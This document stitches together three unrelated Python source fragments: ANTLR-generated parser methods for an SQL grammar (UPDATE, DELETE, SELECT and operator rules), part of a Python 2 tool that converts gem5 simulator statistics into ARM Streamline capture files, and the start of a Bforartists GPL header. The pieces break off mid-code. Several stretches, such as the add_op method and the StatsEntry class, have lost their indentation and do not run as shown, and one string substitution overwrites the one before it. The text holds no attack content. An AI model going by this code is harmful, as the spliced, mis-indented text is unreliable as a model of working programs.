        while _la==SQLGramaticaParser.T__4:
            self.state = 411
            self.match(SQLGramaticaParser.T__4)
            self.state = 412
            self.match(SQLGramaticaParser.IDX)
            self.state = 417
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 418
        self.match(SQLGramaticaParser.T__3)
        self.state = 419
        self.match(SQLGramaticaParser.VALUES)
        self.state = 420
        self.match(SQLGramaticaParser.T__2)
        self.state = 421
        self.literal()
        self.state = 426
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero or more additional comma-separated literals.
        while _la==SQLGramaticaParser.T__4:
            self.state = 422
            self.match(SQLGramaticaParser.T__4)
            self.state = 423
            self.literal()
            self.state = 428
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 429
        self.match(SQLGramaticaParser.T__3)
    except RecognitionException as re:
        # Standard ANTLR recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class UpdateSetContext(ParserRuleContext):
    """Parse-tree node for the `updateSet` rule (ANTLR-generated)."""

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.UpdateSetContext, self).__init__(parent, invokingState)
        self.parser = parser

    def UPDATE(self):
        return self.getToken(SQLGramaticaParser.UPDATE, 0)

    def IDX(self, i=None):
        # i=None returns all IDX tokens, else the i-th occurrence.
        if i is None:
            return self.getTokens(SQLGramaticaParser.IDX)
        else:
            return self.getToken(SQLGramaticaParser.IDX, i)

    def SET(self):
        return self.getToken(SQLGramaticaParser.SET, 0)

    def tipo(self, i=None):
        if i is None:
            return self.getTypedRuleContexts(SQLGramaticaParser.TipoContext)
        else:
            return self.getTypedRuleContext(SQLGramaticaParser.TipoContext,i)

    def WHERE(self):
        # Optional WHERE clause token (may be absent).
        return self.getToken(SQLGramaticaParser.WHERE, 0)

    def exp(self):
        return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,0)

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_updateSet

    def enterRule(self, listener):
        if hasattr(listener, "enterUpdateSet"):
            listener.enterUpdateSet(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitUpdateSet"):
            listener.exitUpdateSet(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitUpdateSet"):
            return visitor.visitUpdateSet(self)
        else:
            return visitor.visitChildren(self)
def updateSet(self):
    """ANTLR-generated rule method.

    Grammar shape: UPDATE IDX SET IDX '=' tipo (',' tipo)* (WHERE exp)?.
    State numbers come from the generated ATN; do not edit by hand.
    """
    localctx = SQLGramaticaParser.UpdateSetContext(self, self._ctx, self.state)
    self.enterRule(localctx, 60, self.RULE_updateSet)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 431
        self.match(SQLGramaticaParser.UPDATE)
        self.state = 432
        self.match(SQLGramaticaParser.IDX)
        self.state = 433
        self.match(SQLGramaticaParser.SET)
        self.state = 434
        self.match(SQLGramaticaParser.IDX)
        self.state = 435
        self.match(SQLGramaticaParser.T__5)
        self.state = 436
        self.tipo()
        self.state = 441
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero or more additional comma-separated assignments.
        while _la==SQLGramaticaParser.T__4:
            self.state = 437
            self.match(SQLGramaticaParser.T__4)
            self.state = 438
            self.tipo()
            self.state = 443
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 446
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Optional WHERE clause.
        if _la==SQLGramaticaParser.WHERE:
            self.state = 444
            self.match(SQLGramaticaParser.WHERE)
            self.state = 445
            self.exp()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DeleteFromContext(ParserRuleContext):
    """Parse-tree node for the `deleteFrom` rule (ANTLR-generated)."""

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.DeleteFromContext, self).__init__(parent, invokingState)
        self.parser = parser

    def DELETE(self):
        return self.getToken(SQLGramaticaParser.DELETE, 0)

    def FROM(self):
        return self.getToken(SQLGramaticaParser.FROM, 0)

    def IDX(self):
        return self.getToken(SQLGramaticaParser.IDX, 0)

    def WHERE(self):
        # Optional WHERE clause token (may be absent).
        return self.getToken(SQLGramaticaParser.WHERE, 0)

    def exp(self):
        return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,0)

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_deleteFrom

    def enterRule(self, listener):
        if hasattr(listener, "enterDeleteFrom"):
            listener.enterDeleteFrom(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitDeleteFrom"):
            listener.exitDeleteFrom(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitDeleteFrom"):
            return visitor.visitDeleteFrom(self)
        else:
            return visitor.visitChildren(self)
def deleteFrom(self):
    """ANTLR-generated rule method.

    Grammar shape: DELETE FROM IDX (WHERE exp)?.
    State numbers come from the generated ATN; do not edit by hand.
    """
    localctx = SQLGramaticaParser.DeleteFromContext(self, self._ctx, self.state)
    self.enterRule(localctx, 62, self.RULE_deleteFrom)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 448
        self.match(SQLGramaticaParser.DELETE)
        self.state = 449
        self.match(SQLGramaticaParser.FROM)
        self.state = 450
        self.match(SQLGramaticaParser.IDX)
        self.state = 453
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Optional WHERE clause.
        if _la==SQLGramaticaParser.WHERE:
            self.state = 451
            self.match(SQLGramaticaParser.WHERE)
            self.state = 452
            self.exp()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class SelectFromContext(ParserRuleContext):
    """Parse-tree node for the `selectFrom` rule (ANTLR-generated)."""

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.SelectFromContext, self).__init__(parent, invokingState)
        self.parser = parser

    def SELECT(self):
        return self.getToken(SQLGramaticaParser.SELECT, 0)

    def sep(self):
        # Select list: '*' or comma-separated identifiers (see sep rule).
        return self.getTypedRuleContext(SQLGramaticaParser.SepContext,0)

    def FROM(self):
        return self.getToken(SQLGramaticaParser.FROM, 0)

    def IDX(self):
        return self.getToken(SQLGramaticaParser.IDX, 0)

    def WHERE(self):
        return self.getToken(SQLGramaticaParser.WHERE, 0)

    def exp(self, i=None):
        if i is None:
            return self.getTypedRuleContexts(SQLGramaticaParser.ExpContext)
        else:
            return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,i)

    def ORDER(self):
        return self.getToken(SQLGramaticaParser.ORDER, 0)

    def BY(self):
        return self.getToken(SQLGramaticaParser.BY, 0)

    def ASC(self, i=None):
        if i is None:
            return self.getTokens(SQLGramaticaParser.ASC)
        else:
            return self.getToken(SQLGramaticaParser.ASC, i)

    def DESC(self, i=None):
        if i is None:
            return self.getTokens(SQLGramaticaParser.DESC)
        else:
            return self.getToken(SQLGramaticaParser.DESC, i)

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_selectFrom

    def enterRule(self, listener):
        if hasattr(listener, "enterSelectFrom"):
            listener.enterSelectFrom(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitSelectFrom"):
            listener.exitSelectFrom(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitSelectFrom"):
            return visitor.visitSelectFrom(self)
        else:
            return visitor.visitChildren(self)
def selectFrom(self):
    """ANTLR-generated rule method.

    Grammar shape (as generated): SELECT sep FROM IDX
    (WHERE exp (ORDER BY exp ASC | DESC (',' exp ASC | DESC)*)?)?.
    State numbers come from the generated ATN; do not edit by hand.
    """
    localctx = SQLGramaticaParser.SelectFromContext(self, self._ctx, self.state)
    self.enterRule(localctx, 64, self.RULE_selectFrom)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 455
        self.match(SQLGramaticaParser.SELECT)
        self.state = 456
        self.sep()
        self.state = 457
        self.match(SQLGramaticaParser.FROM)
        self.state = 458
        self.match(SQLGramaticaParser.IDX)
        self.state = 479
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Optional WHERE clause, which may carry an ordering suffix.
        if _la==SQLGramaticaParser.WHERE:
            self.state = 459
            self.match(SQLGramaticaParser.WHERE)
            self.state = 460
            self.exp()
            self.state = 477
            self._errHandler.sync(self)
            token = self._input.LA(1)
            if token in [SQLGramaticaParser.ORDER]:
                # Alt 1: ORDER BY exp ASC
                self.state = 461
                self.match(SQLGramaticaParser.ORDER)
                self.state = 462
                self.match(SQLGramaticaParser.BY)
                self.state = 463
                self.exp()
                self.state = 464
                self.match(SQLGramaticaParser.ASC)
                pass
            elif token in [SQLGramaticaParser.DESC]:
                # Alt 2: DESC followed by repeated (',' exp ASC | DESC)
                self.state = 466
                self.match(SQLGramaticaParser.DESC)
                self.state = 474
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                while _la==SQLGramaticaParser.T__4 or _la==SQLGramaticaParser.DESC:
                    self.state = 472
                    self._errHandler.sync(self)
                    token = self._input.LA(1)
                    if token in [SQLGramaticaParser.T__4]:
                        self.state = 467
                        self.match(SQLGramaticaParser.T__4)
                        self.state = 468
                        self.exp()
                        self.state = 469
                        self.match(SQLGramaticaParser.ASC)
                        pass
                    elif token in [SQLGramaticaParser.DESC]:
                        self.state = 471
                        self.match(SQLGramaticaParser.DESC)
                        pass
                    else:
                        raise NoViableAltException(self)
                    self.state = 476
                    self._errHandler.sync(self)
                    _la = self._input.LA(1)
                pass
            elif token in [SQLGramaticaParser.EOF, SQLGramaticaParser.T__1, SQLGramaticaParser.CREATE, SQLGramaticaParser.ALTER, SQLGramaticaParser.DROP, SQLGramaticaParser.SHOW, SQLGramaticaParser.USE, SQLGramaticaParser.INSERT, SQLGramaticaParser.SELECT, SQLGramaticaParser.UPDATE, SQLGramaticaParser.DELETE]:
                # Alt 3: no ordering suffix; next statement/EOF follows.
                pass
            else:
                pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class SepContext(ParserRuleContext):
    """Parse-tree node for the `sep` (select-list) rule (ANTLR-generated)."""

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.SepContext, self).__init__(parent, invokingState)
        self.parser = parser

    def IDX(self, i=None):
        # i=None returns all selected-column tokens, else the i-th.
        if i is None:
            return self.getTokens(SQLGramaticaParser.IDX)
        else:
            return self.getToken(SQLGramaticaParser.IDX, i)

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_sep

    def enterRule(self, listener):
        if hasattr(listener, "enterSep"):
            listener.enterSep(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitSep"):
            listener.exitSep(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitSep"):
            return visitor.visitSep(self)
        else:
            return visitor.visitChildren(self)
def sep(self):
    """ANTLR-generated rule method.

    Grammar shape: '*' | IDX (',' IDX)* — the SELECT column list.
    State numbers come from the generated ATN; do not edit by hand.
    """
    localctx = SQLGramaticaParser.SepContext(self, self._ctx, self.state)
    self.enterRule(localctx, 66, self.RULE_sep)
    self._la = 0 # Token type
    try:
        self.state = 490
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [SQLGramaticaParser.T__6]:
            # Alt 1: the wildcard token.
            self.enterOuterAlt(localctx, 1)
            self.state = 481
            self.match(SQLGramaticaParser.T__6)
            pass
        elif token in [SQLGramaticaParser.IDX]:
            # Alt 2: one identifier plus zero or more ',' IDX pairs.
            self.enterOuterAlt(localctx, 2)
            self.state = 482
            self.match(SQLGramaticaParser.IDX)
            self.state = 487
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SQLGramaticaParser.T__4:
                self.state = 483
                self.match(SQLGramaticaParser.T__4)
                self.state = 484
                self.match(SQLGramaticaParser.IDX)
                self.state = 489
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Rel_opContext(ParserRuleContext):
    """Parse-tree node for the `rel_op` rule (ANTLR-generated).

    Relational operators are anonymous T__ tokens, so there are no
    named accessors here.
    """

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.Rel_opContext, self).__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_rel_op

    def enterRule(self, listener):
        if hasattr(listener, "enterRel_op"):
            listener.enterRel_op(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitRel_op"):
            listener.exitRel_op(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitRel_op"):
            return visitor.visitRel_op(self)
        else:
            return visitor.visitChildren(self)
def rel_op(self):
    """ANTLR-generated rule: match one relational operator token.

    Uses the generated bitset test to accept exactly the operator tokens
    (T__5, T__7..T__10); anything else triggers inline recovery.
    """
    localctx = SQLGramaticaParser.Rel_opContext(self, self._ctx, self.state)
    self.enterRule(localctx, 68, self.RULE_rel_op)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 492
        _la = self._input.LA(1)
        if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SQLGramaticaParser.T__5) | (1 << SQLGramaticaParser.T__7) | (1 << SQLGramaticaParser.T__8) | (1 << SQLGramaticaParser.T__9) | (1 << SQLGramaticaParser.T__10))) != 0)):
            self._errHandler.recoverInline(self)
        else:
            self._errHandler.reportMatch(self)
            self.consume()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Eq_opContext(ParserRuleContext):
    """Parse-tree node for the `eq_op` rule (ANTLR-generated).

    Equality operators are anonymous T__ tokens; no named accessors.
    """

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.Eq_opContext, self).__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_eq_op

    def enterRule(self, listener):
        if hasattr(listener, "enterEq_op"):
            listener.enterEq_op(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitEq_op"):
            listener.exitEq_op(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitEq_op"):
            return visitor.visitEq_op(self)
        else:
            return visitor.visitChildren(self)
def eq_op(self):
    """ANTLR-generated rule: match one equality operator token
    (T__11 or T__12), with inline recovery on anything else."""
    localctx = SQLGramaticaParser.Eq_opContext(self, self._ctx, self.state)
    self.enterRule(localctx, 70, self.RULE_eq_op)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 494
        _la = self._input.LA(1)
        if not(_la==SQLGramaticaParser.T__11 or _la==SQLGramaticaParser.T__12):
            self._errHandler.recoverInline(self)
        else:
            self._errHandler.reportMatch(self)
            self.consume()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Add_opContext(ParserRuleContext):
    """Parse-tree node for the `add_op` rule (ANTLR-generated).

    Additive operators are anonymous T__ tokens; no named accessors.
    """

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.Add_opContext, self).__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_add_op

    def enterRule(self, listener):
        if hasattr(listener, "enterAdd_op"):
            listener.enterAdd_op(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitAdd_op"):
            listener.exitAdd_op(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitAdd_op"):
            return visitor.visitAdd_op(self)
        else:
            return visitor.visitChildren(self)
def add_op(self):
localctx = SQLGramaticaParser.Add_opContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_add_op)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 496
_la = self._input.LA(1)
if not(_la==SQLGramaticaParser.T__0 or _la==SQLGramaticaParser.T__13):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception | |
len(unified_event_list)
for process in process_list:
if process.pid > 9990: # fix up framebuffer ticks
process.tick = start_tick
print process.uid, process.pid, process.tgid, \
process.task_name, str(process.tick)
for thread in process.children:
if thread.pid > 9990:
thread.tick = start_tick
print "\t", thread.uid, thread.pid, thread.tgid, \
thread.task_name, str(thread.tick)
end_tick = tick
print "Start tick:", start_tick
print "End tick: ", end_tick
print ""
return
def initOutput(output_path):
    """Create the output (.apc) directory if it does not already exist.

    Uses EAFP (try/except) instead of an exists() pre-check so a
    concurrent creation of the directory between check and mkdir cannot
    raise a spurious error; any OSError other than "already exists"
    (permissions, missing parent, ...) is re-raised.
    """
    import errno  # local import: the file-level import block is outside this chunk
    try:
        os.mkdir(output_path)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise
def ticksToNs(tick):
    """Convert a gem5 tick count to nanoseconds.

    Relies on the module-global ticks_in_ns, which is computed from
    sim_freq while parsing the stats file; exits if conversion is
    attempted before it has been set.
    NOTE(review): under Python 2 this is floor division when both
    operands are ints — presumably intended; confirm.
    """
    if ticks_in_ns < 0:
        print "ticks_in_ns not set properly!"
        sys.exit(1)
    return tick / ticks_in_ns
def writeXmlFile(xml, filename):
    """Serialize an ElementTree element to `filename`, pretty-printed.

    Serialization happens before the file is opened, and the file is
    opened in a with-block, so a failure no longer leaks the handle or
    leaves a half-created empty file behind (the original opened first
    and never closed on error).
    """
    txt = ET.tostring(xml)
    pretty = minidom.parseString(txt).toprettyxml()
    with open(filename, "w") as f:
        f.write(pretty)
# StatsEntry that contains individual statistics
class StatsEntry(object):
def __init__(self, name, group, group_index, per_cpu, key):
# Full name of statistics
self.name = name
# Streamline group name that statistic will belong to
self.group = group
# Index of statistics within group (used to change colors within groups)
self.group_index = group_index
# Shorter name with "system" stripped off
# and symbols converted to alphanumerics
self.short_name = re.sub("system\.", "", name)
self.short_name = re.sub(":", "_", name)
# Regex for this stat (string version used to construct union regex)
self.regex_string = "^" + name + "\s+([\d\.]+)"
self.regex = re.compile("^" + name + "\s+([\d\.e\-]+)\s+# (.*)$", re.M)
self.description = ""
# Whether this stat is use per CPU or not
self.per_cpu = per_cpu
# Key used in .apc protocol (as described in captured.xml)
self.key = key
# List of values of stat per timestamp
self.values = []
# Whether this stat has been found for the current timestamp
self.found = False
# Whether this stat has been found at least once
# (to suppress too many warnings)
self.not_found_at_least_once = False
# Field used to hold ElementTree subelement for this stat
self.ET_element = None
# Create per-CPU stat name and regex, etc.
if self.per_cpu:
self.per_cpu_regex_string = []
self.per_cpu_regex = []
self.per_cpu_name = []
self.per_cpu_found = []
for i in range(num_cpus):
if num_cpus > 1:
per_cpu_name = re.sub("#", str(i), self.name)
else:
per_cpu_name = re.sub("#", "", self.name)
self.per_cpu_name.append(per_cpu_name)
print "\t", per_cpu_name
self.per_cpu_regex_string.\
append("^" + per_cpu_name + "\s+[\d\.]+")
self.per_cpu_regex.append(re.compile("^" + per_cpu_name + \
"\s+([\d\.e\-]+)\s+# (.*)$", re.M))
self.values.append([])
self.per_cpu_found.append(False)
def append_value(self, val, per_cpu_index = None):
if self.per_cpu:
self.values[per_cpu_index].append(str(val))
else:
self.values.append(str(val))
# Global stats object that contains the list of stats entries
# and other utility functions
class Stats(object):
    """Registry of all StatsEntry objects plus the per-window tick list."""

    def __init__(self):
        self.stats_list = []  # all registered StatsEntry objects
        self.tick_list = []   # absolute gem5 tick of each stats window
        self.next_key = 1     # next unique .apc counter key to hand out

    def register(self, name, group, group_index, per_cpu):
        # Each stat gets a unique, monotonically increasing key.
        print "registering stat:", name, "group:", group, group_index
        self.stats_list.append(StatsEntry(name, group, group_index, per_cpu, \
            self.next_key))
        self.next_key += 1

    # Union of all stats to accelerate parsing speed
    def createStatsRegex(self):
        regex_strings = [];
        print "\nnum entries in stats_list", len(self.stats_list)
        for entry in self.stats_list:
            if entry.per_cpu:
                for i in range(num_cpus):
                    regex_strings.append(entry.per_cpu_regex_string[i])
            else:
                regex_strings.append(entry.regex_string)
        # One alternation regex: a single match() call decides whether a
        # stats-file line is interesting at all.
        self.regex = re.compile('|'.join(regex_strings))
def registerStats(config_file):
    """Read the stats config.ini and build the Stats registry.

    Sections: PER_CPU_STATS (expanded per CPU inside StatsEntry),
    PER_L2_STATS (expanded here over num_l2, '#' replaced by the L2
    index), OTHER_STATS. Each option value is a newline-separated list
    of stat names. Exits if the config file cannot be read.
    """
    print "==============================="
    print "Parsing stats config.ini file..."
    print config_file
    print "==============================="
    config = ConfigParser()
    if not config.read(config_file):
        print "ERROR: config file '", config_file, "' not found!"
        sys.exit(1)
    print "\nRegistering Stats..."
    stats = Stats()
    per_cpu_stat_groups = config.options('PER_CPU_STATS')
    for group in per_cpu_stat_groups:
        i = 0
        per_cpu_stats_list = config.get('PER_CPU_STATS', group).split('\n')
        for item in per_cpu_stats_list:
            if item:
                stats.register(item, group, i, True)
                i += 1
    per_l2_stat_groups = config.options('PER_L2_STATS')
    for group in per_l2_stat_groups:
        i = 0
        per_l2_stats_list = config.get('PER_L2_STATS', group).split('\n')
        for item in per_l2_stats_list:
            if item:
                # One registration per L2; '#' is the L2-index placeholder.
                for l2 in range(num_l2):
                    if num_l2 > 1:
                        name = re.sub("#", str(l2), item)
                    else:
                        name = re.sub("#", "", item)
                    stats.register(name, group, i, False)
                i += 1
    other_stat_groups = config.options('OTHER_STATS')
    for group in other_stat_groups:
        i = 0
        other_stats_list = config.get('OTHER_STATS', group).split('\n')
        for item in other_stats_list:
            if item:
                stats.register(item, group, i, False)
                i += 1
    stats.createStatsRegex()
    return stats
# Parse and read in gem5 stats file
# Streamline counters are organized per CPU
def readGem5Stats(stats, gem5_stats_file):
    """Parse the (possibly gzipped) gem5 stats file into `stats`.

    Walks the file window by window (between the Begin/End Simulation
    Statistics markers), appending one value per stat per window, and
    derives the global ticks_in_ns from sim_freq. Stops at the global
    end_tick. Missing stats get a 0 value and a one-time warning.
    """
    print "\n==============================="
    print "Parsing gem5 stats file..."
    print gem5_stats_file
    print "===============================\n"
    ext = os.path.splitext(gem5_stats_file)[1]
    window_start_regex = \
        re.compile("^---------- Begin Simulation Statistics ----------")
    window_end_regex = \
        re.compile("^---------- End Simulation Statistics ----------")
    final_tick_regex = re.compile("^final_tick\s+(\d+)")
    global ticks_in_ns
    sim_freq_regex = re.compile("^sim_freq\s+(\d+)")
    sim_freq = -1
    try:
        if ext == ".gz":
            f = gzip.open(gem5_stats_file, "r")
        else:
            f = open(gem5_stats_file, "r")
    except:
        print "ERROR opening stats file", gem5_stats_file, "!"
        sys.exit(1)
    # Stats still unseen in the current window (pruned as they match).
    stats_not_found_list = stats.stats_list[:]
    window_num = 0
    while (True):
        error = False
        try:
            line = f.readline()
        except IOError:
            # Truncated gzip streams are tolerated: flush the current
            # window below, then stop.
            # NOTE(review): if this fires on the very first iteration,
            # `line` is unbound and the check below raises NameError.
            print ""
            print "WARNING: IO error in stats file"
            print "(gzip stream not closed properly?)...continuing for now"
            error = True
        if not line:
            break
        # Find out how many gem5 ticks in 1ns
        if sim_freq < 0:
            m = sim_freq_regex.match(line)
            if m:
                sim_freq = int(m.group(1)) # ticks in 1 sec
                ticks_in_ns = int(sim_freq / 1e9)
                print "Simulation frequency found! 1 tick == %e sec\n" \
                    % (1.0 / sim_freq)
        # Final tick in gem5 stats: current absolute timestamp
        m = final_tick_regex.match(line)
        if m:
            tick = int(m.group(1))
            # Stop once we pass the region of interest.
            if tick > end_tick:
                break
            stats.tick_list.append(tick)
        if (window_end_regex.match(line) or error):
            # Close out the window: any stat not seen gets a 0 value, and
            # the found flags are reset for the next window.
            if args.verbose:
                print "new window"
            for stat in stats.stats_list:
                if stat.per_cpu:
                    for i in range(num_cpus):
                        if not stat.per_cpu_found[i]:
                            if not stat.not_found_at_least_once:
                                print "WARNING: stat not found in window #", \
                                    window_num, ":", stat.per_cpu_name[i]
                                print "suppressing further warnings for " + \
                                    "this stat"
                                stat.not_found_at_least_once = True
                            stat.values[i].append(str(0))
                        stat.per_cpu_found[i] = False
                else:
                    if not stat.found:
                        if not stat.not_found_at_least_once:
                            print "WARNING: stat not found in window #", \
                                window_num, ":", stat.name
                            print "suppressing further warnings for this stat"
                            stat.not_found_at_least_once = True
                        stat.values.append(str(0))
                    stat.found = False
            stats_not_found_list = stats.stats_list[:]
            window_num += 1
            if error:
                break
        # Do a single regex of the union of all stats first for speed
        if stats.regex.match(line):
            # Then loop through only the stats we haven't seen in this window
            for stat in stats_not_found_list[:]:
                if stat.per_cpu:
                    for i in range(num_cpus):
                        m = stat.per_cpu_regex[i].match(line)
                        if m:
                            # ipc is scaled x1000 so it survives the
                            # integer conversion below.
                            if stat.name == "ipc":
                                value = str(int(float(m.group(1)) * 1000))
                            else:
                                value = str(int(float(m.group(1))))
                            if args.verbose:
                                print stat.per_cpu_name[i], value
                            stat.values[i].append(value)
                            stat.per_cpu_found[i] = True
                            # Prune only when all CPUs have matched.
                            all_found = True
                            for j in range(num_cpus):
                                if not stat.per_cpu_found[j]:
                                    all_found = False
                            if all_found:
                                stats_not_found_list.remove(stat)
                            if stat.description == "":
                                stat.description = m.group(2)
                else:
                    m = stat.regex.match(line)
                    if m:
                        value = str(int(float(m.group(1))))
                        if args.verbose:
                            print stat.name, value
                        stat.values.append(value)
                        stat.found = True
                        stats_not_found_list.remove(stat)
                        if stat.description == "":
                            stat.description = m.group(2)
    f.close()
# Create session.xml file in .apc folder
def doSessionXML(output_path):
    """Write the Streamline session.xml describing this capture."""
    session_file = output_path + "/session.xml"
    xml = ET.Element("session")
    # Fixed capture settings. Duration is set to zero for now; it does
    # not affect visualization.
    settings = [
        ("version", "1"),
        ("call_stack_unwinding", "no"),
        ("parse_debug_info", "no"),
        ("high_resolution", "yes"),
        ("buffer_mode", "streaming"),
        ("sample_rate", "low"),
        ("duration", "0"),
        ("target_host", ""),
        ("target_port", "8080"),
    ]
    for attr, value in settings:
        xml.set(attr, value)
    writeXmlFile(xml, session_file)
# Create captured.xml file in .apc folder
def doCapturedXML(output_path, stats):
    # Describes the capture target plus one <counter> element per gem5 stat,
    # so Streamline knows how to chart the counter data written elsewhere.
    captured_file = output_path + "/captured.xml"
    xml = ET.Element("captured")
    xml.set("version", "1")
    xml.set("protocol", "17")
    xml.set("backtrace_processing", "none")
    target = ET.SubElement(xml, "target")
    target.set("name", "gem5")
    target.set("sample_rate", "1000")
    target.set("cores", str(num_cpus))
    counters = ET.SubElement(xml, "counters")
    for stat in stats.stats_list:
        s = ET.SubElement(counters, "counter")
        # Counter names must be plain identifiers: turn '.' into '_' and drop
        # '#'.  str.replace does this directly and avoids the unescaped-regex
        # pitfall of the old re.sub("\.", ...) call.
        stat_name = stat.short_name.replace(".", "_").replace("#", "")
        s.set("title", stat.group)
        s.set("name", stat_name)
        s.set("color", "0x00000000")
        s.set("key", "0x%08x" % stat.key)
        s.set("type", stat_name)
        s.set("event", "0x00000000")
        if stat.per_cpu:
            s.set("per_cpu", "yes")
        else:
            s.set("per_cpu", "no")
        s.set("display", "")
        s.set("units", "")
        s.set("average_selection", "no")
        s.set("description", stat.description)
    writeXmlFile(xml, captured_file)
# Writes out Streamline cookies (unique IDs per process/thread)
def writeCookiesThreads(blob):
    # Emit one cookie-name frame per process with a positive uid, then one
    # thread-name frame per thread.  Streamline requires thread records in
    # timestamp order, hence the sort by first-seen tick.
    thread_list = []
    for process in process_list:
        if process.uid > 0:
            print "cookie", process.task_name, process.uid
            writeBinary(blob, cookieNameFrame(process.uid, process.task_name))
        # pid and tgid need to be positive values -- no longer true?
        for thread in process.children:
            thread_list.append(thread)
    # Threads need to be sorted in timestamp order
    thread_list.sort(key = lambda x: x.tick)
    for thread in thread_list:
        print "thread", thread.task_name, (ticksToNs(thread.tick)),\
            thread.tgid, thread.pid
        writeBinary(blob, threadNameFrame(ticksToNs(thread.tick),\
            thread.pid, thread.task_name))
# Writes context switch info as Streamline scheduling events
def writeSchedEvents(blob):
    # One sched-switch frame per context-switch event, per cpu.  The cookie
    # links the event back to its owning process; 0 when the tgid has no
    # entry in process_dict.
    for cpu in range(num_cpus):
        for event in event_list[cpu]:
            timestamp = ticksToNs(event.tick)
            pid = event.task.tgid
            tid = event.task.pid
            if process_dict.has_key(event.task.tgid):
                cookie = process_dict[event.task.tgid].uid
            else:
                cookie = 0
            # State:
            # 0: waiting on other event besides I/O
            # 1: Contention/pre-emption
            # 2: Waiting on I/O
            # 3: Waiting on mutex
            # Hardcoding to 0 for now. Other states not implemented yet.
            state = 0
            if args.verbose:
                print cpu, timestamp, pid, tid, cookie
            writeBinary(blob,\
                schedSwitchFrame(cpu, timestamp, pid, tid, cookie, state))
# Writes selected gem5 statistics as Streamline counters
def writeCounters(blob, stats):
timestamp_list = []
for tick in stats.tick_list:
if tick > end_tick:
break
timestamp_list.append(ticksToNs(tick))
for | |
<reponame>BlazesRus/Bforartists<gh_stars>1-10
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
